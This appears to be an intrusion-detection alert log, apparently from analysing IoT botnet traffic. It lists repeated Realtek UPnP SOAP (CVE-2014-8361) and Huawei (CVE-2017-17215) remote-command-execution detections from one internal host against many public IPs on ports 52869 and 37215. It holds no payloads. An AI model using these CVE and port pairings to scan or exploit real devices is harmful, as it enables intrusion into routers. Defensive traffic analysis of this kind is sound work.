                                      07/20/24-23:01:55.863393TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25295252869192.168.2.23166.125.46.208
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929437215192.168.2.23157.188.52.205
                                      07/20/24-23:01:44.024775TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614540252869192.168.2.2345.226.155.34
                                      07/20/24-23:01:08.646615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25240652869192.168.2.23218.228.206.146
                                      07/20/24-23:01:47.663629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3409652869192.168.2.23108.242.179.170
                                      07/20/24-23:01:57.101402TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24953652869192.168.2.239.97.212.169
                                      07/20/24-23:01:08.939279TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23389052869192.168.2.23133.66.91.121
                                      07/20/24-23:01:20.098209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726037215192.168.2.23197.242.27.50
                                      07/20/24-23:01:43.197088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4193052869192.168.2.2377.119.24.21
                                      07/20/24-23:02:15.172220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5033652869192.168.2.23133.103.41.145
                                      07/20/24-23:01:51.113661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5815252869192.168.2.23118.190.106.207
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.2341.65.238.83
                                      07/20/24-23:01:51.183470TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4773852869192.168.2.23107.137.22.219
                                      07/20/24-23:01:26.004683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3852052869192.168.2.2314.200.138.62
                                      07/20/24-23:01:42.462291TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25156052869192.168.2.23169.160.238.67
                                      07/20/24-23:01:47.403768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4737252869192.168.2.2393.36.62.56
                                      07/20/24-23:01:50.920103TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615712252869192.168.2.23192.255.251.248
                                      07/20/24-23:01:56.832956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4247452869192.168.2.23162.18.0.14
                                      07/20/24-23:01:42.090121TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24351052869192.168.2.2385.101.71.143
                                      07/20/24-23:01:42.985320TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613490252869192.168.2.2385.91.68.35
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854637215192.168.2.23197.21.203.147
                                      07/20/24-23:01:42.769239TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23277452869192.168.2.2399.233.112.21
                                      07/20/24-23:01:44.756264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4913252869192.168.2.2375.52.105.57
                                      07/20/24-23:01:45.622888TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615752052869192.168.2.2374.81.74.58
                                      07/20/24-23:02:14.728323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5519052869192.168.2.23132.156.134.177
                                      07/20/24-23:00:57.221048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627837215192.168.2.23157.203.14.217
                                      07/20/24-23:01:34.045749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813237215192.168.2.23157.206.45.101
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786037215192.168.2.2341.231.145.68
                                      07/20/24-23:02:01.320867TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616001452869192.168.2.23144.39.142.95
                                      07/20/24-23:01:59.188717TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25017252869192.168.2.23143.107.137.70
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650237215192.168.2.23197.161.187.52
                                      07/20/24-23:01:02.515992TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615202652869192.168.2.23186.94.179.5
                                      07/20/24-23:01:59.643531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614420052869192.168.2.23216.13.194.92
                                      07/20/24-23:02:48.060990TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308052869192.168.2.2343.238.238.121
                                      07/20/24-23:01:41.660997TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23954052869192.168.2.23124.109.117.107
                                      07/20/24-23:01:56.925238TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5386652869192.168.2.23132.12.76.39
                                      07/20/24-23:01:58.364551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4844652869192.168.2.23192.226.51.190
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.23187.182.184.30
                                      07/20/24-23:00:59.161892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150637215192.168.2.23157.139.2.14
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780637215192.168.2.23157.143.234.224
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673037215192.168.2.23197.187.87.186
                                      07/20/24-23:01:44.469580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5746052869192.168.2.23165.29.53.230
                                      07/20/24-23:01:31.321189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5823652869192.168.2.23103.96.50.123
                                      07/20/24-23:01:34.044538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977037215192.168.2.2372.130.195.64
                                      07/20/24-23:01:00.645186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059637215192.168.2.2341.212.198.90
                                      07/20/24-23:01:46.453936TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613499452869192.168.2.2396.24.157.5
                                      07/20/24-23:01:00.651026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773637215192.168.2.2341.242.166.123
                                      07/20/24-23:01:24.889164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894037215192.168.2.23157.24.252.54
                                      07/20/24-23:01:08.864629TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24065052869192.168.2.23199.214.91.137
                                      07/20/24-23:01:08.613165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5736452869192.168.2.23144.0.5.154
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321437215192.168.2.23197.131.189.107
                                      07/20/24-23:01:49.158487TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25008852869192.168.2.23116.148.59.65
                                      07/20/24-23:02:17.128772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614108652869192.168.2.23184.199.50.191
                                      07/20/24-23:01:08.589760TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23963652869192.168.2.2318.37.139.58
                                      07/20/24-23:01:42.280418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5117452869192.168.2.2390.145.205.177
                                      07/20/24-23:01:44.787907TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24358052869192.168.2.23199.182.118.208
                                      07/20/24-23:01:42.727671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4142852869192.168.2.23169.97.165.219
                                      07/20/24-23:01:54.859884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5707052869192.168.2.23155.152.164.248
                                      07/20/24-23:01:11.828422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803237215192.168.2.23157.52.72.38
                                      07/20/24-23:01:57.022868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615194452869192.168.2.23186.85.31.59
                                      07/20/24-23:02:04.052371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210052869192.168.2.23104.143.173.10
                                      07/20/24-23:01:40.349275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533437215192.168.2.2324.27.124.225
                                      07/20/24-23:01:07.005156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440037215192.168.2.23197.82.145.73
                                      07/20/24-23:01:44.481011TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24351052869192.168.2.23153.239.16.237
                                      07/20/24-23:01:43.751196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4717852869192.168.2.23147.72.210.150
                                      07/20/24-23:02:22.606515TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24834852869192.168.2.23176.129.124.225
                                      07/20/24-23:01:43.211007TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614649052869192.168.2.23136.80.115.81
                                      07/20/24-23:01:51.785967TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23718252869192.168.2.23116.126.39.243
                                      07/20/24-23:01:11.634372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085237215192.168.2.23197.128.60.5
                                      07/20/24-23:01:44.776719TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25265652869192.168.2.2358.56.54.197
                                      07/20/24-23:01:41.987411TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288652869192.168.2.2318.151.187.19
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420837215192.168.2.23197.250.23.28
                                      07/20/24-23:01:02.093903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169237215192.168.2.23155.230.89.206
                                      07/20/24-23:01:11.631937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6047437215192.168.2.2341.171.182.143
                                      07/20/24-23:01:04.031511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510037215192.168.2.2341.115.102.16
                                      07/20/24-23:02:00.006558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6095852869192.168.2.23221.117.11.208
                                      07/20/24-23:01:31.312895TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24277052869192.168.2.23178.214.207.137
                                      07/20/24-23:01:45.547334TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23766252869192.168.2.23185.111.137.113
                                      07/20/24-23:01:51.949637TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3549652869192.168.2.23125.174.13.114
                                      07/20/24-23:01:02.229743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4796452869192.168.2.2371.113.201.241
                                      07/20/24-23:01:53.560520TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24968852869192.168.2.23175.53.167.172
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619837215192.168.2.23157.3.230.130
                                      07/20/24-23:01:59.799089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25312252869192.168.2.23105.66.231.198
                                      07/20/24-23:01:46.783122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4220252869192.168.2.23164.23.204.131
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286837215192.168.2.23113.30.251.105
                                      07/20/24-23:01:20.202325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083037215192.168.2.23197.39.102.71
                                      07/20/24-23:01:40.334934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259037215192.168.2.23197.67.65.109
                                      07/20/24-23:01:54.859884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614943852869192.168.2.23120.82.97.31
                                      07/20/24-23:00:57.221338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912437215192.168.2.23157.236.245.35
                                      07/20/24-23:01:01.458734TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614103452869192.168.2.23193.14.204.18
                                      07/20/24-23:01:01.810641TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615976452869192.168.2.23188.112.254.56
                                      07/20/24-23:01:41.478928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3666852869192.168.2.23113.184.252.189
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946637215192.168.2.23197.236.253.31
                                      07/20/24-23:01:08.572556TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25358452869192.168.2.23172.32.160.159
                                      07/20/24-23:01:42.774505TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25384452869192.168.2.2377.77.166.196
                                      07/20/24-23:01:59.855159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3461052869192.168.2.23188.131.252.163
                                      07/20/24-23:01:02.113055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046637215192.168.2.23197.139.203.167
                                      07/20/24-23:01:14.113390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946637215192.168.2.2341.135.77.144
                                      07/20/24-23:01:48.811098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3839052869192.168.2.2364.225.111.147
                                      07/20/24-23:01:14.105395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906037215192.168.2.23142.66.65.211
                                      07/20/24-23:01:58.556960TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615590852869192.168.2.2379.25.231.52
                                      07/20/24-23:01:41.228795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3979852869192.168.2.2347.91.11.144
                                      07/20/24-23:01:53.068033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3944652869192.168.2.23109.27.210.57
                                      07/20/24-23:01:42.631864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4904452869192.168.2.23132.180.52.133
                                      07/20/24-23:01:41.260372TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614963452869192.168.2.23111.66.162.186
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410437215192.168.2.2341.123.176.91
                                      07/20/24-23:01:52.720788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5070652869192.168.2.23216.216.135.51
                                      07/20/24-23:01:57.549758TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615082452869192.168.2.2349.127.162.127
                                      07/20/24-23:01:45.104633TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25865652869192.168.2.2365.50.132.254
                                      07/20/24-23:01:34.062277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4495037215192.168.2.23197.193.238.28
                                      07/20/24-23:01:44.745095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3658052869192.168.2.23140.201.238.135
                                      07/20/24-23:01:07.018425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007037215192.168.2.2370.120.208.1
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527837215192.168.2.23197.222.87.125
                                      07/20/24-23:01:26.226478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5102452869192.168.2.23103.227.74.238
                                      07/20/24-23:01:40.331150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141837215192.168.2.23197.93.167.88
                                      07/20/24-23:01:41.549052TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615895052869192.168.2.2352.97.71.90
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830237215192.168.2.2371.233.58.215
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312237215192.168.2.2341.28.206.33
                                      07/20/24-23:01:45.037292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5668652869192.168.2.23186.231.211.62
                                      07/20/24-23:01:54.922661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24118252869192.168.2.2362.211.74.184
                                      07/20/24-23:01:43.283253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3726652869192.168.2.23223.250.7.213
                                      07/20/24-23:01:50.128003TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24027852869192.168.2.2342.169.174.111
                                      07/20/24-23:01:25.752492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5294252869192.168.2.23203.166.233.2
                                      07/20/24-23:01:41.496780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615318052869192.168.2.2377.77.166.196
                                      07/20/24-23:02:10.141900TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613888252869192.168.2.23201.77.215.250
                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867037215192.168.2.23157.241.240.40
                                      07/20/24-23:01:43.020186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5896852869192.168.2.2323.210.80.134
                                      07/20/24-23:01:44.756265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25917052869192.168.2.23156.254.5.127
                                      07/20/24-23:01:02.272048TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614221652869192.168.2.2364.43.73.86
                                      07/20/24-23:01:08.638879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3675252869192.168.2.2380.176.127.107
                                      07/20/24-23:01:42.717611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25628252869192.168.2.23201.170.107.7
                                      07/20/24-23:01:42.780168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614135652869192.168.2.23187.139.238.2
                                      07/20/24-23:01:49.412594TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614772852869192.168.2.23117.131.224.39
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293637215192.168.2.23137.33.55.254
                                      07/20/24-23:01:08.619597TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23426652869192.168.2.2340.55.203.85
                                      07/20/24-23:01:44.881852TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614779252869192.168.2.23212.188.148.79
                                      07/20/24-23:01:50.075288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614162452869192.168.2.23118.134.216.118
                                      07/20/24-23:01:34.045144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168437215192.168.2.23157.248.228.18
                                      07/20/24-23:01:14.097135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503637215192.168.2.2341.142.235.21
                                      07/20/24-23:01:04.155095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5017852869192.168.2.23218.228.206.146
                                      07/20/24-23:01:25.012815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4102052869192.168.2.23115.28.108.81
                                      07/20/24-23:01:44.968238TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091652869192.168.2.23145.77.223.88
                                      07/20/24-23:00:59.185032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090837215192.168.2.2341.96.218.16
                                      07/20/24-23:01:44.826234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699452869192.168.2.23111.252.176.80
                                      07/20/24-23:01:10.770014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615696252869192.168.2.23112.132.188.245
                                      07/20/24-23:01:47.062116TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613392052869192.168.2.2374.191.12.65
                                      07/20/24-23:01:41.258403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4117652869192.168.2.235.95.241.47
                                      07/20/24-23:01:45.060540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614563052869192.168.2.2378.233.35.58
                                      07/20/24-23:01:08.632574TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24152052869192.168.2.234.114.3.131
                                      07/20/24-23:01:07.022763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796837215192.168.2.23171.136.141.166
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726037215192.168.2.238.108.207.220
                                      07/20/24-23:01:42.664090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5838652869192.168.2.23113.55.199.122
                                      07/20/24-23:02:06.393178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613735652869192.168.2.23169.213.252.233
                                      07/20/24-23:01:25.001980TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614093652869192.168.2.23199.241.141.173
                                      07/20/24-23:01:08.582150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024852869192.168.2.23120.187.5.172
                                      07/20/24-23:01:13.192248TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616078252869192.168.2.2375.68.195.20
                                      07/20/24-23:01:44.469869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615322652869192.168.2.23156.42.244.253
                                      07/20/24-23:01:01.443835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5238452869192.168.2.2390.243.193.156
                                      07/20/24-23:01:41.991545TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4810452869192.168.2.23164.216.180.24
                                      07/20/24-23:01:08.668802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3733452869192.168.2.23205.45.42.138
                                      07/20/24-23:02:11.791090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4472852869192.168.2.23208.100.183.132
                                      07/20/24-23:00:59.218458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149037215192.168.2.2341.75.68.114
                                      07/20/24-23:01:43.135090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4549052869192.168.2.2350.90.160.227
                                      07/20/24-23:02:17.128771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5571452869192.168.2.23201.34.254.148
                                      07/20/24-23:01:59.292118TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25855252869192.168.2.23159.133.17.143
                                      07/20/24-23:01:53.432917TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613659052869192.168.2.23141.86.15.181
                                      07/20/24-23:02:01.256493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3854252869192.168.2.2338.218.208.52
                                      07/20/24-23:01:20.599458TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3760452869192.168.2.23105.36.101.44
                                      07/20/24-23:01:45.053180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615121652869192.168.2.2374.211.16.76
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711637215192.168.2.2327.137.24.94
                                      07/20/24-23:01:10.251070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3701052869192.168.2.23207.199.110.98
                                      07/20/24-23:01:47.726021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115852869192.168.2.2320.63.97.204
                                      07/20/24-23:01:31.978142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5873437215192.168.2.23197.153.118.82
                                      07/20/24-23:01:42.374543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433852869192.168.2.23189.30.194.82
                                      07/20/24-23:01:43.607934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615151452869192.168.2.2341.215.7.68
                                      07/20/24-23:01:48.275988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614842652869192.168.2.23107.5.49.194
                                      07/20/24-23:01:02.299793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4571652869192.168.2.23130.136.141.197
                                      07/20/24-23:01:53.066716TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24478252869192.168.2.2369.202.155.168
